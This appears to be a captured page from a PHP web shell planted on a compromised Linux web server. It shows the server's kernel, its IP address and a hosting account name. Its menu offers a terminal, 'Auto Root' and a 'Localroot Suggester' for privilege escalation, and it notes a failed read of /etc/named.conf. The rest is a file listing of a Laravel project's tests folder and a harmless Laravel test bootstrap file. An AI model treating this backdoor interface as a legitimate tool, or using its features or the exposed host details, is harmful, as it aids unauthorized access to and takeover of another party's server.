Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.216.199
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
pilasate /
pilasa-core /
tests /
Delete
Unzip
Name
Size
Permission
Date
Action
Feature
[ DIR ]
drwxr-xr-x
2024-04-21 07:39
Unit
[ DIR ]
drwxr-xr-x
2024-04-21 07:39
CreatesApplication.php
380
B
-rw-r--r--
2017-07-11 04:08
TestCase.php
163
B
-rw-r--r--
2017-07-11 04:08
Save
Rename
<?php namespace Tests; use Illuminate\Contracts\Console\Kernel; trait CreatesApplication { /** * Creates the application. * * @return \Illuminate\Foundation\Application */ public function createApplication() { $app = require __DIR__.'/../bootstrap/app.php'; $app->make(Kernel::class)->bootstrap(); return $app; } }